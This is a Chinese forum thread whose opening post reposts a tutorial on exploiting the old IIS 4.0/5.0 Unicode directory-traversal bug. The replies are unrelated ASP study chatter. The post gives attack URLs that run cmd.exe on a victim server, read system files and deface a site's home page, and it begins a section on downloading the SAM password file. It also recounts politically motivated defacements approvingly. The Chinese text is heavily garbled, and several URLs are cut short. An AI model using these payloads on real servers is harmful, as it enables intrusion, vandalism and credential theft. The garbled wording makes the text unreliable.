仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 610|回复: 8
打印 上一主题 下一主题

[学习教程] ASP编程:unicode最终使用 《转》

[复制链接]
灵魂腐蚀 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 23:19:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
ASP一般认为只能运行在IIS上,正如前面所提到的,这并不是十分正确,事实上,ASP也能运行在Apache上。ApacheASP可在任意Apache服务器上运行有限的ASP功能,所需做的,只需打开mod_perl。比来这些日子很多多少的WINNT的服务器被黑,特别是国际的。上面是一些详细示例的总结。
上面这范例的毛病以发明近一年多了,一年多前在外洋的黑客网站就有了相似的文章,但
是事先并没有良多人器重。,在反北约的黑客战中有良多就是用上面这些例子了。
不外直到UNICOUDE毛病的发明,黑NT的盘算机变的傻瓜化了。上面我把比来的一些文章总
结一下。
但愿人人能从这里体味到点甚么。(上面的文章来自一些邮件列表和BBS)


道理:(实在本来都很类似,我拿这个做个例子。)

NSFOCUS平安小组发明IIS4.0和IIS5.0在Unicode字符解码的完成中存在一个平安毛病,
招致用户能够远程经由过程IIS实行恣意命令。当IIS翻开文件时,假如该文件名包括unicode
字符,它会对其举行解码,假如用户供应一些特别的编码,将招致IIS毛病的翻开大概执
行某些web根目次之外的文件。
关于IIS5.0/4.0中文版,当IIS收到的URL哀求的文件名中包括一个特别的编码比方"%c1%hh"
大概"%c0%hh",它会起首将其解码酿成:0xc10xhh,然后实验翻开这个文件,Windows体系
以为0xc10xhh多是unicode编码,因而它会起首将其解码,假如0x00<=%hh<0x40的话,
接纳的解码的格局与上面的格局相似:
%c1%hh->(0xc1-0xc0)*0x40+0xhh
%c0%hh->(0xc0-0xc0)*0x40+0xhh
因而,使用这类编码,我们能够机关良多字符,比方:
%c1%1c->(0xc1-0xc0)*0x40+0x1c=0x5c=/
%c0%2f->(0xc0-0xc0)*0x40+0x2f=0x2f=
打击者能够使用这个毛病来绕过IIS的路径反省,往实行大概翻开恣意的文件。
(1)假如体系包括某个可实行目次,便可能实行恣意体系命令。上面的URL大概
列出以后目次的内容:
http://www.victim.com/scripts/..%c1.../cmd.exe?/c+dir
(2)使用这个毛病检察体系文件内容也是大概的:
http://www.victim.com/a.asp/..%c1%1..../winnt/win.ini
RainForestPuppy测试发明关于英文版的IIS4.0/5.0,此成绩一样
存在,只是编码格局略有分歧,酿成"%c0%af"大概"%c1%9c".
上面我们的例子以%c1%1c为主解说。
注:+号能够用%20取代,依这类格局你还能够机关出很多命令
很多多少站点inetpub下的scripts目次删除,
但ProgramFilesCommonFilesSystem下
的msadc还在(有msadcs.dll毛病的话就不必
%c1%1c了)。这时候能够以下机关哀求:
http://ip/msadc/..%c1%1c../..%c1%1c....exe?/c+dir+c:


理论一:(修正主页----最复杂化的一种)

良多进侵都以修正主页的情势体现出来,这一般有两种情形:一是表达本人的
气愤――好比昔时以美国为首的北约轰炸我驻南使馆的突发事务以后,国际良多黑客
在ICQ、BBS一呼百诺,纷繁对敌国举行各类情势的打击,固然以交换主页最为民怨沸腾!
二是在给网管发e-mail毛病呈报以后没反响,有的黑客按耐不住,就用修正主页的体例给
予告诫,用以引发人们关于平安手艺的器重。固然提及来这是守法的啦,以是人人要注重
哦,不要光图一时的利落索性,呵呵!
可使用ECHO命令、管道符等创建文件,修正文件内容。但由于IIS加载程序检测到有
CMD.EXE大概COMMAND.COM串就要检测特别字符“&|(,;%”,假如发明有这些字符就会返
回500毛病,以是不克不及间接利用CMD.EEX加管道符等。因而能够接纳拷贝CMD.EXE换名的办法
绕已往。
http://xxx.xxx.xxx.xxx/scripts/..%c...scriptsccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc....ked+by+chinese+>+f:wwwrootxxxdefault.asp
http://xxx.xxx.xxx.xxx/scripts/ccc....+echo+1/1/2001+>>+f:wwwrootxxxdefault.asp
就改了主页了!
这类办法关于有负载平衡的主机很不便利,又必要几回才干完成,以是欠好。袁哥给出了
另外一种更便利的举措。参考袁哥(yuange)的帖子《IIS不必拷贝CMD.EXE利用管道符等的方
法》,能够如许:
http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd".exe?/c+echo+Hacked+by+
hacker+>+f:wwwrootxxxdefault.asp
http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd".exe?/c+echo+12/1/2k+>>+
f:wwwrootxxxdefault.asp
如许,主页就被变动成了:
Hackedbyhacker
12/1/2k
固然我是没有如许做啦,不外这些器材我都在本人设置的情况下完成了,

在我实习的过程当中发明,用ECHO写这些的时分很慢,假如你屡次回车,过一阵屏幕革新后
主页上就会留下多个你要写的内容。




理论二(下载SAM文件)

http://xxx.xxx.xxx.xxx/scripts/..%c.../winnt/system32
/cmd.exe?/c+dir%20c:发明列出了远程主机C:下的一切文件,
实行:http://xxx.xxx.xxx.xxx/scripts/..
海妖 该用户已被删除
沙发
发表于 2015-1-20 09:30:05 | 只看该作者
作为IE上广为流传的动态网页开发技术,ASP以它简单易学博得了广大WEB程序爱好这的青睐,而且它对运行环境和开发品台的不挑剔,以及有大量有效的参考手册,极大的推广了它的发展。
若天明 该用户已被删除
板凳
发表于 2015-1-29 06:25:51 | 只看该作者
运用经典的例子。并且自己可以用他来实现一些简单的系统。如果可以对他进行进一步的修改,找出你觉得可以提高性能的地方,加上自己的设计,那就更上一个层次了,也就会真正地感到有所收获。
深爱那片海 该用户已被删除
地板
发表于 2015-2-5 20:25:32 | 只看该作者
我认为比较好的方法是找一些比较经典的例子,每个例子比较集中一种编程思想而设计的。
小女巫 该用户已被删除
5#
发表于 2015-2-13 07:42:50 | 只看该作者
我们必须明确一个大方向,不要只是停留在因为学而去学,我们应有方向应有目标.
小妖女 该用户已被删除
6#
发表于 2015-3-3 17:49:30 | 只看该作者
虽然ASP也有很多网络教程。但是这些都不系统。都是半路出家,只是从一个例子告诉你怎么用。不会深入讨论,更不会将没有出现在例子里的方法都一一列举出来。
变相怪杰 该用户已被删除
7#
发表于 2015-3-11 11:55:46 | 只看该作者
从事这个行业,那么你可以学ASP语言,简单快速上手,熟练dreamweav排版,写asp代码,熟练photoshop处理图片,打好基础就行了
只想知道 该用户已被删除
8#
发表于 2015-3-18 10:06:52 | 只看该作者
Server:这个表示的服务器,操作服务器的一些东西使用这个,如Server.Mappath转换服务器路径,Server.CreateObject实例化一个组件
小魔女 该用户已被删除
9#
发表于 2015-3-25 15:30:36 | 只看该作者
我想问如何掌握学习节奏(先学什么再学什么)最好详细点?
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 20:59

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表